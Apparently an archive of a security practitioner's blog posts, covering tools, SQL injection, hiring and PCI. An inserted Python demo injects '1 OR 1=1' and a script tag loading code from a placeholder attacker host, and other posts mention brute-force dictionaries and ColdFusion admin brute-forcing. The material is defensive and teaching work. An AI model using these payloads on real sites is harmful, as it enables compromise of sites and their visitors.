    Videos from the 24th CCC have been posted. I highly recommend Toying with Barcodes by FX. It is nice to think about the various ways technology around us can be extremely vulnerable to tampering, and barcodes are ripe. I'm sure this is old news to many tinkerers (hackers), but FX does an excellent job highlighting many issues.

    Black Hat USA 2007 videos are also up.

    Tunak Tunak Tun is an infectious music video. Some of the dance moves occur in WoW.
    .: accessing linux filesystems in windows
    A lot of attention in the Linux world goes to accessing Windows partitions (NTFS) in Linux. From Hackosis, I've recently been pointed to Windows tools that can access Linux partitions. This can be useful if you dual boot and have multiple file systems on the same local disk (or if you mount another disk onto a system, although I'm not sure why anyone would want to mount a Linux disk on a Windows system... I guess backups and even Windows-only forensics tools might be some reasons).

    Linux Reader allows read-only access to ext2 and ext3 from a Windows system. Ext2 Installable File System will allow read and write access to ext2 from a Windows system.
    .: new live cds and standalone firewall installs
    There continue to be a good number of live cd distros available with a security slant. Here are some links, although some I've not even booted into yet to check out.

    Russix is a wireless pen-testing live cd that appears to make the most common wireless penetration tasks surprisingly automated.

    Hex 1.0.2 is a platform for network security monitoring.

    Deft v3 is a self-explanatory live cd: Digital Evidence and Forensic Toolkit.

    Honeywall 1.3 appears to be a data capture installer. This isn't a live cd, but rather an installer that should be run on an empty or expendable hard disk.

    Various other firewall installs are also available as usual. IPCop 1.4.18, pfSense 1.2 RC3, SmoothWall Express 3.0, m0n0wall 1.3b7, Untangle.
    .: 2008 winter scripting games
    The Winter Scripting Games 2008 are right around the corner, starting February 15. Last year, these "games" gave me the kick in the pants to try out Microsoft's PowerShell scripting, and I must say it might be one of the better skills I acquired through last year; something I could use both at home and at work.

    I plan to participate again this year in the PowerShell division(s), but I see they are also including Perl in the games this year. I think I will try to put the most effort into the Perl section since I'm horribly rusty with it.

    So check it out, give them a try, and pencil in those dates to save some evenings for devoting some time to the challenges.
    .: installing portbunny on ubuntu 7.04
    PortBunny 1.0 has been released, a tool I mentioned just a few days ago. I run Ubuntu 7.04 on my laptop and wanted to try PortBunny on it.
    michael@orion:~/Desktop$ tar xfz PortBunny-1.0.tar.gz
    michael@orion:~/Desktop$ cd PortBunny-1.0/
    michael@orion:~/Desktop/PortBunny-1.0$ make
    make -C /lib/modules/2.6.20-16-386/build M=/home/michael/Desktop/PortBunny-1.0 modules
    make: *** /lib/modules/2.6.20-16-386/build: No such file or directory. Stop.
    make: *** [all] Error 2
    Dang, I thought I had the linux-kernel-headers installed. It is easy to check whether the installation is complete by looking for the existence of /lib/modules/2.6.20-16-386/build. If it is not there, the headers need to be properly installed. The command 'uname -r' will display the current kernel version. In the command below, those are backticks (accent marks), which substitute the output of uname -r into the package name.
    sudo apt-get install linux-headers-`uname -r`
    After that, a "make" and a "make install" succeed and PortBunny happily port scans whatever I point it at. It had no problems scanning the few boxes on my network as long as I didn't have any active firewalls running, i.e. a firewall that shuns me after a threshold of port connection attempts. Good stuff!
    .: create a dictionary file
    Just to pull something from a mailing list and file it away for future reference, here are two tools that can help create "dictionary" files for...you know what. Note that these aren't necessarily dictionary files of valid words, but rather huge character sets of up to x length.

    Dictmake (exe!)
    2004 Hacking Brute Force Dictionary Creator in zip format
    .: irony in local admins circumventing group policy
    Mark Russinovich is a Microsoft employee; you may have heard of him. On a recent blog post he describes how his AutoPlay feature in Vista stopped working due to a Group Policy update. Mark, being a coveted local administrator on his laptop (a work-assigned one, as implied by the post), found the setting to re-enable AutoPlay. And to prevent Group Policy from reverting the setting to what his admin wants, he opted to block it by adjusting permissions.

    Now, Mark likely has a work-related reason to use AutoPlay, and took steps to get his work done (giving a demo of the feature) by circumventing his admins and likely corporate policy. And then posted this for others to see and learn from, both technically and by example.

    Mark says,
    A local administrator is the master of the computer and is able to do anything they want, including circumventing domain policies...and that's just one more reason enterprises should strive to have their end users run as standard users.
    So, is Microsoft wrong for allowing someone like Mark to run as local admin? Or is Mark wrong for circumventing that trust? For lesser employees, I would be more forgiving, but Mark full well knows what he's doing. Likewise, if anyone qualifies for local admin rights on a corporate-issued laptop, Mark is the least of your worries. Should Mark work with his GP admin to either do this better or make Mark an exception (admins love exceptions)? Things that make you go hmmm.

    I just find this all unintentionally funny...and a horrible grey area for us professionals.
    .: the python challenge
    Need a reason to play with Python? Try playing the 30+ levels of The Python Challenge. Solve the problem, move up to the next level.
    .: recent mass-hack of sites
    Saw some news today about "94,000 sites hacked" and sending users to a malware-ridden site. That's a hell of a lot, and prompted some investigation on our team. Sadly, we've found very few useful bits of information about what happened (I suspect some common piece of software on all these sites was pwned...analytics? ads? site mgmt?). We have, however, decided to block two URLs, *.ucmal dot com and *.uc8010 dot com as they are distributing malware. The Google search linked in that first article shows an impressive array of pages and sites...
    .: mass sql injection
    I mentioned yesterday a report about tens of thousands of websites being infected by some malware. SANS has an update which also points to the ModSecurity blog. Turns out this was some automated process that sought out SQL Injection-vulnerable sites, injected the script, and moved on. Impressive!

    This kinda drives home some concepts.

    1) Think of an attack today that seems unlikely or something that an attacker would do manually. Plan on that attack being automated someday. Yes, web app secs will say some things aren't like that, like business process errors, but for the most part attacks can be automated, just like vuln scans can be automated. This can be done by a small number of scanners running, or even a rented botnet that can infect huge swaths of systems quickly. The next worm? We don't need to worry about the next worm when botnets can act as one at will. Just give them a vulnerability, or now even a class of vulnerability that can be scanned for, and bam, overnight firestorm. And for every site attacked in the last few weeks, that can turn into hundreds of infected visitors to that site.

    2) If you check that Google search for infected sites, you've just got an inventory of sites vulnerable to SQL Injection. Do a diff on them over the next few days, and you'll filter out the sites with good response to incidents. Want to steal some info or do more targeted and nefarious things? There's your target list...

    3) Mitigations? Sure we can erect barriers in WAFs (ugh) to help block these things, but it all comes back down to secure coding, regular scans/audits, change control tripwires, and monitoring. What's worse than being hit by this attack? Being hit and never knowing it.
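    As an added example (not from the SANS or ModSecurity posts, and not this blog's own code), here is the shape of the bug the automated attacks exploited, written against an in-memory SQLite table constructed for the purpose: a string-built UPDATE whose WHERE clause the attacker widens to every row, next to the parameterized version, plus the monitoring query that catches the "hit and never knowing it" case. The table, the attacker strings and the hostname are all constructed placeholders.

```python
import sqlite3

# Constructed sample data: a tiny "pages" table standing in for the content
# tables the automated attacks rewrote. Everything here is illustrative.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("home", "<p>Welcome</p>"), ("about", "<p>About us</p>"), ("news", "<p>News</p>")],
    )
    conn.commit()
    return conn

# Constructed attacker input (the hostname is a placeholder, not an indicator
# from the post): the page id turns the WHERE clause into "id = 1 OR 1=1",
# and the note is the script tag that then gets appended to every row.
EVIL_PAGE_ID = "1 OR 1=1"
EVIL_NOTE = '<script src="http://attacker.invalid/x.js"></script>'

def append_note_vulnerable(conn, page_id, note):
    """Appends a note to one page, but builds the SQL by string concatenation.
    Returns the number of rows changed, which an attacker can push to 'all'."""
    sql = "UPDATE pages SET body = body || '" + note + "' WHERE id = " + page_id
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount

def append_note_safe(conn, page_id, note):
    """Same feature, hardened: the id is validated as an integer and both
    values travel as bound parameters, so input never becomes SQL syntax.
    (What the note itself may contain is a separate validation and output
    encoding question; parameters only stop the SQL injection.)"""
    pid = int(page_id)  # "1 OR 1=1" fails here with ValueError
    cur = conn.execute("UPDATE pages SET body = body || ? WHERE id = ?", (note, pid))
    conn.commit()
    return cur.rowcount

def pages_with_script(conn):
    """Monitoring check for the 'hit and never knowing it' case: titles of
    pages whose stored body now carries a <script> tag."""
    rows = conn.execute(
        "SELECT title FROM pages WHERE body LIKE '%<script%' ORDER BY id"
    ).fetchall()
    return [title for (title,) in rows]

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable rows changed:", append_note_vulnerable(db, EVIL_PAGE_ID, EVIL_NOTE))
    print("pages now carrying script:", pages_with_script(db))
    db = setup_db()
    try:
        append_note_safe(db, EVIL_PAGE_ID, EVIL_NOTE)
    except ValueError as exc:
        print("safe version rejected the id:", exc)
    print("pages carrying script after safe call:", pages_with_script(db))
```

    Running the monitoring query on a schedule and diffing its output is the cheap change-control tripwire the paragraph above asks for.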
    .: intolerant of the inevitable
    A reminder-to-self about a phrase I should start using more: intolerant of the inevitable. A security breach is inevitable and there is no silver bullet to save us. Yet we're so very intolerant of such an inevitability. It's a double standard we need to keep addressing. This is not necessarily a digital security problem, but rather a cultural one. (I had examples, but I'll keep it at this for now, for sanity.)

    (If you know the place I posted about this in the comments, then you might be a stalker!)
    .: bejtlich on finding competent security personnel
    Bejtlich posted an excellent email from a reader of his asking how to find competent security personnel. What a wonderfully worded email, and rather than post a huge comment on Richard's site, I thought I would pollute my own blog with it instead! I'll try to keep it bulleted (something I've been striving to do this year). I also printed out the questions; I try to always honestly answer such things as practice.

    1. Unlike some commenters, I really like the questions posed. Sure, they can be vague, but part of a hiring question should be to get the analyst to analyze. What is the interviewer *really* going after, and can you help them along by accepting and adapting to the question? While you're fiddling over details of the scenario, the incident is still happening.

    2. Look for analysts in the right places. If I knew about this job and it was in my area, I'd apply or pass it on to others. Are you finding me? I would be willing to bet that the post on Bejtlich's blog produced several job candidates; I'd bet a better return than current efforts have yielded! Get to places where we hang out...Security Focus has a job board, SecurityCatalyst Forums, and so on. Get your own security blog and join the Security Blogger's Network to get good exposure and post the job. Or have one of them post it up. Check with your local Infragard (a great place to network!) or even other local professional tech groups like CIPTUG to see if they know people interested or maybe one of them wants to cross over.

    3. I can say the term "senior" can be daunting. Newer security-inclined persons may avoid such a job title, at least at first. On the other hand, the term "junior" might imply entry level or fresh out of college and you might deter some people. I like more neutral titles, personally.

    4. Make sure you're properly valuing this role. A lot of people will say a manager needs to pony up and pay competitive salaries, but that is often out of the manager's hands. Perhaps the company itself needs to properly value the position/need and advertise properly. This might mean dropping the "senior" off and grooming some more green persons.

    5. I think Richard is correct: there are still few people who can properly answer those questions, let alone actually do what the answers describe. However, I think there is still a good number of people willing to be groomed into such a position, or to groom themselves up if given the chance.

    6. "Am I setting the bar too high?" Maybe. I think accuracy in answers can be fixed, but personality in handling the questions is much more difficult. If they don't know the difference in responses between a web attack and a client side buffer overflow, they can quickly learn via process documentation or after the first one or two incidents of each. Are they capable of detail, learning, and improvement? Then again, that's maybe the difference between the "senior" and the "not-senior" guys out there.
    .: info sharing efficiency challenging more than just riaa
    I was reading Marcin's post today which included a mention about the boy who created a remote to change tram rail junctions, leading to a derailment. I also recently bought my first Rubik's Cube ever, and then looked up the theory on solving it (no, I don't have the time or the mathematical interest/patience to truly learn it, but I wanted to know the approach and algorithms involved...no, I would never have figured it out myself, I think). I also read about remotes turning off televisions at CES, disrupting presentations.

    What do these mean? I think there are still a lot of things that are very hackable. While the cyberverse keeps progressing at breakneck speed, much of the analog world is still using old technology that greatly relies on hidden knowledge. In the past, much like the Rubik's Cube, I really wouldn't have easy access to solve the puzzle. These days, information sharing and problem-solving is amazingly accessible to so many people.
    .: the new face of cybercrime, trailer
    From Fortify Software comes this trailer called The New Face of Cybercrime. The part that really spoke the loudest, in my mind, was near the end when Ranum came in to essentially say that no software is so trivial that it can be made without security in mind. Who knows when that software will be picked up and used in a way that people's lives depend upon it. It looks like this full video might be a staple of any corporate bookshelf for awareness training.

    My only beef on this? It appears sponsored by Fortify Software, and they definitely have a stake in saying the security of tomorrow is not in the network but rather in the software and the software development lifecycle. This could turn out to simply be a big budget advertisement...
    .: link to the top ten myths of pci dss
    I've long been able to identify an rss feed in my news that dealt only with PCI and be able to quickly skim it or remove it from my feeds. "PCI doesn't really affect me, although I should stay aware of it." Ok, I know that's not true, I do need to know it, and this year that becomes more obvious. Our company has a soft goal of becoming PCI compliant. And, yes, it is driven by a large client who requires it.

    In that light, I'll still have to keep up to speed on PCI nuances and Q&A posts. Walt Conway over on the PCI DSS News and Information blog recently posted his top 10 myths about PCI DSS (part 1 part 2 part 3).
    "And if we were compliant at that moment, we are still only one system change away from being non-compliant."
    And on the myth that "PCI is inflexible with unreasonable technical, security, and business requirements,"
    I hear this one a lot, and I do not agree. Nothing in PCI is not already a best practice (so much for being unreasonable), and there is the option of a compensating control for any requirement (so much for inflexibility).
    I feel that PCI is tough when a) the business doesn't know what the business is doing (processing cards) or b) thinking about and doing security is way behind.
    .: my little law of security as an enabler
    I've quietly been compiling a list of "laws" for my paradigm on security. I like lists of "laws;" they help put one into a proper mindset where questions are answered before they're asked, leaving time for more important things. I used to have such a list of laws when it came to dating girls back when I was in college. They were great, but I'm still unmarried so maybe they worked too well...oops!

    One of my little laws (they do frolic in a quiet pasture like my little ponies) sobs a lot these days:
    Security is not an enabler except in three cases. First, when the organization is in the business of security (software, hardware, services...). Second, when security is required for the business path to exist. Third, when economic forces suggest that security is the cost-effective answer (e.g. cost of security is less than the cost of fines or lawsuits for breaches).
    I often hear about how security should be an enabler and not an inhibitor. I don't buy that. With regard to the second case above, this only happens when a regulation, expectation, or law exists that places an economic leverage on the organization to meet a level of security, which can then allow business to occur. This is a natural extension of the inverse relationship between usability and security. This says to me that all other security efforts are not enablers, so move on to more important matters and proper frames of mind.
    .: the misplaced blame of a complexaholic
    This article may make you angry, or it may make you agree with it. I'm a bit of both, but I don't particularly like the presentation. How'd I see this? My CIO passed this out today to people in her department. Michael H. Hugos (MHH) talks about IT complexity in The Recovering Complexaholic, from the Opinion section of ComputerWorld (Nov. 5, 2007). Let's check it out a bit.
    There’s a standing joke that business people never have to ask IT how long something will take and what it will cost because they already know the answers: It always takes a year and costs $1 million — and that’s just for the simple stuff.
    When I first read this, I actually went the opposite direction. "Business people never have to ask IT how long something will take and what it will cost because they've already made up their minds that it will be immediate and cost nothing." Oops, he went the other way with that joke!

    MHH then goes into how "consumer IT" is better than corporate IT, which I think he is confusing with the overall SaaS movement. I'm not sure I would consider that "consumer IT." Does "consumer IT" know anything about managing 50+ systems, softwares, policies, accounts, or pieces of data? Not usually. Just because you can access it from your browser at home on your own computer does not mean the solution is "consumer IT."

    He also opines about how IT makes things so complex that nothing gets done, and when it does, it costs a lot of money. I think business as a whole is as guilty of this as IT. Business can often not make decisions and leaves such things to IT to sort out. IT then has to cover all the bases and make processes so robust that they become complex monsters, just to CYA in case something doesn't meet some unspoken requirement. Business can condition IT to overanalyze and overcomplicate solutions just as much as an IT person can get caught up in it themselves. This is basic Psychology 101 conditioning.

    I truly think complex IT can be just as successful as cowboy IT (come on, that's what MHH kinda sounds like he wants...get things done, think about it later), but it all depends on the personality of management and aligning IT to that personality. If the org is a large slow-moving organization that expects this project only to be done once, you might need to make it complex and large. If the company is small, fast-moving, and likely to revamp the whole architecture in 3 years when it makes a big break and growth spurt, then keep it simple.

    I really buy into the idea that we just need to Get Shit Done. I also buy into the desire (not need, mind you!) to keep things from becoming complex. IT people really do hate complexity as much as anyone. It makes problems difficult to diagnose, compounds itself over time (try to build a complementary system to an already complex system...it becomes complex itself), and typically promotes instability and insecurity. Besides, we want to accomplish things as well, not just let something stupid drag on for 12 months.

    Yes, IT can perpetuate the problem, but I think the problem is not something you can lay on IT alone, but rather everyone involved. I think this is called 'alignment,' but I could be stepping outside my pay grade there.

    MHH asks a few rhetoricals: "What is our objection to this stuff? That it’s not scalable in the enterprise? That it’s not robust? Or that it doesn’t feed our addiction to complexity?" These questions depend on what management wants, and trust me, if IT has been bitten by mgmt in the past, they WILL know how to approach these answers. When I propose "consumer IT" as a solution to problem A, will management later get frustrated that it can't be tailored to what our processes are (instead we have to use the product the same as everyone else)? That's a valid concern, especially when IT knows Mgmt can't stay within the lines of the solution...
    .: what is with the boring posts
    I had a lot of work going on in the latter half of last year, and am only now recovering enough to tinker with things at home again, hence my lack of interesting technical posts and such. I've gotten myself back on the wagon by beginning the migration of my webserver from WAMP to LAMP, and this blog itself from MT 3.34 to MT4 (which I hope will fix my comment rss feed). So far testing has been positive, and I'm sure I'll post some sort of step-by-step on what I did to migrate in case anyone wants to copy meh.

    One thing I've wanted to do this year on this site is make less rant/discussion posts and more technically useful posts. I've gotten away from it lately, and it definitely makes me feel a bit guilty.
    .: it's a geek lifestyle thing
    Jeff Hayes just wrote a nice post about hiring and retaining "Millennials," those workers aged 18-30 (whew, that includes me just barely!). I like what he says, and I really think you can make some relatively small expenses to really keep employees happy and productive. I know Joel Spolsky advocates doing the little things to create a good working atmosphere. Dotcom excess is typified by $900 Aeron chairs, but is $900 really all that bad compared to the productivity that can be gained from a developer paid $70,000 a year? Perspective...

    I would also add that people my age and younger really do use the Internet as an integral part of our social lives. This means those of us geeks who work in technology have very blurred lines when it comes to work and home life. I'm on a computer at work, I'm on one at home. So please don't stress at me if I do some personal things during the day, since I'll likely do some work stuff at home when inspired. It's not just a 9-to-5 geek thing; it's a lifestyle that encompasses everything that is me and what I do.

    .: certified wireless analysis professional online book
    The online book, Certified Wireless Analysis Professional study guide is up, offered from CWNP. This looks pretty darn detailed.
    .: attacking coldfusion mx 7
    In my last job our developers worked primarily in ColdFusion, most recently MX 7. I picked up some research on the SecurityFocus pen-test mailing list about some ColdFusion MX insecurity tidbits [pdf] that I wanted to save. I really like that one can brute force the admin password from a secondary page (no username, no logon logging) and then upload and execute files.
    .: new chanalyzer 3.0 software for wi-spy
    Picked up from joat that MetaGeek (makers of the Wi-Spy wireless spectrum analyzer USB device) may be gearing up to release Chanalyzer 3.0 soon. Also, they have a Netstumbler replacement for Windows called inSSIDer.

    As much as my Wi-Spy is a cool little toy, the price is still somewhat high. I got mine back when it was only $99, but now that same device is $199 and the higher quality one with an external antenna is $399. Not sure I can recommend this to anyone but people serious about their wireless spectrum needs. I would suggest it to anyone with a wireless network in their business, however. Cheap price for this sort of tool.
    .: the drama with mediadefender
    This piece is an excellent telling of the drama surrounding MediaDefender last year (they had a half year of email stolen and posted online, which the P2P community trumpeted around like a war trophy). Yoinked this from elamb.org.
    .: pcapdiff compares two packet captures for anomalies
    pcapdiff is a Python tool that will compare two packet captures (one from the src system and one from the dst system) and highlight suspicious, mangled or possibly injected packets. It requires pcapy and, of course, Python. Saw this over on Nate Lawson's blog in discussing how to detect TCP RSTs, which is apparently being used by Comcast to combat BitTorrent file sharing.
    .: securely investigate your security alerts
    SANS posted about the possibility that attackers could subvert the administrative process, for example being able to inject website URLs into logs which an admin will then investigate and potentially have his box pwned.

    I find such avenues of recon and exploitation to be quite viable, especially for non-professional admins (the blog author who blindly follows every referrer link for the ego boost). I also like this idea for profiling administrative practices. Are there admins following up on alerts or log entries?

    For myself, I try to be careful with what I view from work when investigating alerts. The last thing I want is to see a scan from an IP, open it in a browser, and be inundated with porn popups. I'd definitely recommend investigating from a Linux VM. At my previous job, our wireless network was physically separated from the main network, and got to the Internet through a generic DSL connection. This is an excellent, non-traceable connection to poke around. Any tracing would lead back to my DSL provider, and pretty much stop dead there. Paranoid? Sure. But I'd rather keep such things in mind than be a security professional living in ignorance...
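    As an added example (not from the SANS post and not this blog's own code), a small Python helper that prepares log lines for an investigator: it defangs every URL so nothing is clickable and strips control characters, which covers the case of a terminal escape smuggled into a request line, a step beyond the URL case the post describes. The log lines, addresses and hostnames are constructed placeholders.

```python
import re

# Constructed sample log lines (placeholder addresses and hostnames, not
# indicators from the post): the request and referrer fields are attacker
# controlled, which is exactly what tempts an admin to click through.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2008:10:01:22 -0600] "GET /admin HTTP/1.1" 404 "http://evil.example/track?u=1"',
    '198.51.100.9 - - [12/Jan/2008:10:01:23 -0600] "GET /index.php HTTP/1.1" 200 "-"',
    '203.0.113.7 - - [12/Jan/2008:10:01:25 -0600] "GET /\x1b[31mx HTTP/1.1" 400 "https://evil.example/"',
]

URL_RE = re.compile(r'https?://[^\s"<>]+', re.IGNORECASE)
# ASCII control characters other than tab and newline; a terminal escape
# sequence smuggled into a request line starts with one of these.
CONTROL_RE = re.compile(r'[\x00-\x08\x0b-\x1f\x7f]')
# The referrer is the last quoted field in these constructed lines.
REFERRER_RE = re.compile(r'"([^"]*)"\s*$')

def defang_url(url):
    """Rewrites a URL so it is still readable but no longer clickable:
    http -> hxxp, https -> hxxps, and dots in the host become [.]."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    scheme = scheme.lower().replace("http", "hxxp")
    return scheme + "://" + host.replace(".", "[.]") + sep + path

def sanitize_line(line):
    """Prepares one log line for display in an investigator's terminal or
    ticket: strips control characters, then defangs every URL in it."""
    line = CONTROL_RE.sub("", line)
    return URL_RE.sub(lambda m: defang_url(m.group(0)), line)

def referrers_for_review(lines):
    """Collects the distinct referrer URLs from the lines, already defanged,
    as a worklist to look at from an isolated VM rather than a work browser."""
    found = []
    for line in lines:
        m = REFERRER_RE.search(line)
        if not m or not URL_RE.fullmatch(m.group(1)):
            continue  # "-" or a malformed referrer: nothing to review
        url = defang_url(m.group(1))
        if url not in found:
            found.append(url)
    return found

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(sanitize_line(line))
    print("referrers to review:", referrers_for_review(SAMPLE_LOG))
```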
    .: sysadmin job over in new york
    If I lived in NYC, I'd totally jump on applying for this Systems Administrator job over at FogCreek. Even if the job wasn't for me, I really would like to say I have experienced a company like FogCreek and see, firsthand, what all the quiet hype is about over there. Joel's blog is one of the very few non-security sites I regularly read.

    By the way, in that above job, you'd work with Michael. And it looks like he has a brand new security blog, Michael on Security. Good times! I really like to see a sysadmin who is aware and interested in security. This can help ensure, especially for small business where he likely does everything, that what they do will be done with at least some security in mind!
    .: zombie article? well, it won't die!
    Sadly, the article "10 Things Your IT Department Won't Tell You," by a wildly brilliant (ugh) Wall Street Journal writer, written last summer, has resurfaced on MSN as one of the most popular news articles of the week in the Tech section. Wonderful. Prominent enough that I heard about this from someone else (my manager).

    My initial reaction still holds up, although I will admit one thing. As IT, we need to make sure we listen to the needs of our business users, not just from the perspective of the company dollar, but also the perspective of the employee's happiness (at least in as much as our company/HR lets us be sensitive to that). Sure, it might be a solution to ban IM and webmail and filter sites, but does that mean the company is fighting a war against culture and social lives? The extreme of that is the RIAA clinging to an old business model. I'm not saying we should capitulate to the users, but we should always make sure we find the right balance for our users and our business.
    .: universal id thoughts
    OpenID is getting more attention this week with Yahoo announcing their use of it. It is getting a little late for predictions, but I'll throw out a long term prediction that any true SSO of this magnitude will not come out of the US, but rather Europe.

    The US does not have a history of cooperation, but rather capitalistic competition. Rather than one "universal" ID, we'll have 5 of them all competing. If Yahoo adopts OpenID, then Microsoft will use their own and Google will use another...oh wait, they already do! We have no hope of having any type of "universal" ID coming out of private industry in the US.

    If some universal ID system does appear in the US, it'll be government-backed, controversial, and take 20+ years to develop. The US is better off adding passwords to the SSN or biometrics or RFID ID/passport cards...

    .: malware unpacking tutorial videos
    I'm not a big software de-engineering guy or reverser and I don't see myself gaining those skills in the next couple years, but someday I might get interested in the topic. While books and blogs and personal contacts are good resources, I really like seeing everything put together and the end results. Here are two video tutorials on unpacking and examining malware from Frank Boldewin over at Offensive Security.

    Practical COM code reconstruction with IDA PRO
    More advanced unpacking - Part I